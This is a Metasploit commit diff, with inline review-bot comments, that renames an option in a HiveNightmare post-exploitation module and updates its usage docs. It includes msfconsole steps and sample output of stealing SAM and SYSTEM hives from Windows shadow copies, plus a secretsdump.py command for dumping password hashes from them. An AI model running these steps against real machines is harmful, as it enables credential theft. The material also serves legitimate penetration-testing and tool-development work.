Rename an option and update docs for HiveNightmare

This commit is contained in:
Spencer McIntyre 2021-07-29 11:43:57 -04:00
parent fb99af1152
commit 36cc2fd7e5
2 changed files with 29 additions and 19 deletions

View File

@ -10,11 +10,15 @@ stored in `store_loot`, you can dump the hashes with some external scripts like
### Installation
VSS is probably already enabled on your Windows 10, if you want to be sure you can follow the steps below :
VSS is probably already enabled on your Windows 10, if you want to be sure you can follow the steps below:
- Go to `System Properties GUI`
- Go to `System Protection`tab
- See in `Protection Settings` list if your drive protection is enabled
* Open the control panel
* Navigate to `System and Security > System`
* Select `System Protection` from the column on the left
* See in `Protection Settings` list if t drive protection is enabled
* Optionally, select `Create` to "Create a resptore point right now..."
* This is necessary if the module can not find an existing Shadow Copy file which can be the case if the Windows
instance is brand new
Be aware that you will need Administrator privileges to follow those steps.
You can read more [here](https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+permissions+on+Windows+1011+hives/27652).
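Review bot: two typos in the new bullet list in this hunk: "See in `Protection Settings` list if t drive protection is enabled" should read "if the drive protection is enabled", and "Create a resptore point right now..." should be "restore point". While touching those lines it would also help to say which drive the reader should check, namely the one Windows is installed on, since that is the volume whose SAM and SYSTEM hives the module retrieves from the shadow copy.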
@ -24,15 +28,15 @@ You can read more [here](https://isc.sans.edu/diary/Summer+of+SAM+-+incorrect+pe
1. Start `msfconsole`
2. `use post/windows/gather/credentials/windows_sam_hivenightmare`
3. `set NBRE_ITER <number>` to specify the number of iterations on file index (default is 10)
3. `set ITERATIONS <number>` to specify the number of iterations on file index (default is 10)
4. `set FILE_INDEX <number>` optionally if you want to target a specific file index instead of iterating on all indexes in a range
5. `run` the module to exploit the vulnerability and potentially leak SAM and SYSTEM files
## Options
### NBRE_ITER
### ITERATIONS
Set NBRE_ITER to specify the number of iterations on Shadow Copy file index.
Set ITERATIONS to specify the number of iterations on Shadow Copy file index.
Windows is saving those files under the volume name `HarddiskVolumeShadowCopy<index>`.
By default, this module is bruteforcing that `index` value by trying all values between 0 and 10, which you can change if needed.
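Review bot: the ITERATIONS description in this hunk is ambiguous about the range it covers. "trying all values between 0 and 10" with a default of 10 does not say whether either end is included, and the sample output further down in this file only ever reports indices 1, 5 and 6, never 0, so please state the exact range the module loops over (for example "indices 1 through ITERATIONS") and make sure the wording matches what the module actually iterates. The step list at the top of the hunk ("set ITERATIONS <number> to specify the number of iterations on file index") has the same wording and should be adjusted in the same way.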
@ -48,15 +52,18 @@ See the following output:
```
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > run
[!] SESSION may not be compatible with this module (incompatible session type: meterpreter)
[+] SAM data found in HarddiskVolumeShadowCopy5 !
[+] SAM data found in HarddiskVolumeShadowCopy6 !
[+] Retrieving files of index 5 as they are the most recently modified...
[+] SAM data saved at C:/Users/test/.msf4/loot/20210728102132_default_127.0.0.1_windows.sam_851932.bin
[+] SYSTEM data saved at C:/Users/test/.msf4/loot/20210728102220_default_127.0.0.1_windows.system_036753.bin
[+] SAM and SYSTEM data were leaked !
[+] SAM data found in HarddiskVolumeShadowCopy1!
[+] Retrieving files of index 1 as they are the most recently modified...
[+] SAM data saved at /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[+] SYSTEM data saved at /home/smcintyre/.msf4/loot/20210729113926_default_192.168.159.15_windows.system_202176.bin
[+] SAM and SYSTEM data were leaked!
[*] Post module execution completed
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) > file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
[*] exec: file /home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin
/home/smcintyre/.msf4/loot/20210729113916_default_192.168.159.15_windows.sam_763500.bin: MS Windows registry file, NT/2000 or above
msf6 post(windows/gather/credentials/windows_sam_hivenightmare) >
```
Then, you can dump the hashes from leaked files with `secretsdump.py` for instance :
Then, you can dump the hashes from leaked files with `secretsdump.py` for instance:
`python3 secretsdump.py -sam <SAM_FILE> -system <SYSTEM_FILE> LOCAL`
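Review bot: the closing secretsdump.py line should say which project the script comes from and where to obtain it, and briefly explain that `LOCAL` tells it to parse the two hive files from disk rather than connecting to a host; as written a reader who has never used secretsdump.py has to guess both. Otherwise the updated sample output is an improvement, in particular the `file` call showing the loot is recognised as "MS Windows registry file, NT/2000 or above" is a useful sanity check and worth keeping.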

View File

@ -9,7 +9,7 @@ class MetasploitModule < Msf::Post
super(
update_info(
info,
'Name' => 'Windows SAM secrets leak - HiveNightmare aka SeriousSAM',
'Name' => 'Windows SAM secrets leak - HiveNightmare',
'Description' => %q{
Due to mismanagement of SAM and SYSTEM hives in Windows 10, it is possible for an unprivileged
user to read those files. But, as they are locked while Windows is running we are not able
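Review bot: "Due to mismanagement of SAM and SYSTEM hives in Windows 10" in the 'Description' is vaguer than the write-up the docs link to, whose title names the cause as incorrect permissions on the Windows 10/11 hive files; suggest wording along the lines of "Due to incorrect permissions on the SAM and SYSTEM hive files in Windows 10, an unprivileged user can read them" so the description states the actual root cause. Moving "SeriousSAM" out of 'Name' is fine since the alias is retained in the Notes 'AKA' list in the next hunk.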
@ -36,12 +36,15 @@ class MetasploitModule < Msf::Post
'SessionTypes' => [ 'meterpreter' ],
'Notes' =>
{
'AKA' => [ 'HiveNightmare', 'SeriousSAM' ],
'Reliability' => [ ],
'SideEffects' => [ ],
'Stability' => [ CRASH_SAFE ]
}
)
)
register_options([
OptInt.new('NBRE_ITER', [true, 'Number of iterations on Shadow Copy file index', 10]),
OptInt.new('ITERATIONS', [true, 'Number of iterations on Shadow Copy file index', 10]),
OptInt.new('FILE_INDEX', [false, 'Optional index parameter to retrieve a specific Shadow Copy file', nil])
])
end
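Review bot: the ITERATIONS option description 'Number of iterations on Shadow Copy file index' does not tell the user what range is tried, so with the default of 10 it is unclear whether the module probes 0-9, 1-10 or 0-10; a description such as 'Highest Shadow Copy index to try (indices 1..N)' would remove the guesswork and should match the docs hunk, which has the same ambiguity. Separately, 'Reliability' => [ ] and 'SideEffects' => [ ] are left empty while 'Stability' is populated; given the module only reads hive copies out of existing shadow copies, an empty SideEffects list is defensible, but Reliability could reasonably carry REPEATABLE_SESSION so the Notes block is complete.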
@ -101,7 +104,7 @@ class MetasploitModule < Msf::Post
loot_files(handle, datastore['FILE_INDEX'])
end
else
fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['NBRE_ITER'] > 0
fail_with(Failure::BadConfig, 'Please specify an iteration number greater than 0!') unless datastore['ITERATIONS'] > 0
most_recent_time = nil
most_recent_shadow_copy = nil
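Review bot: the fail_with message 'Please specify an iteration number greater than 0!' should name the option now that it has been renamed, e.g. 'ITERATIONS must be greater than 0', so a user who hits it knows which datastore value to fix. Placing the check in the else branch is correct, since ITERATIONS is irrelevant once FILE_INDEX is set, but there is no equivalent range check on FILE_INDEX in the visible lines; it is worth confirming that the branch above rejects 0 and negative values rather than passing them straight into loot_files.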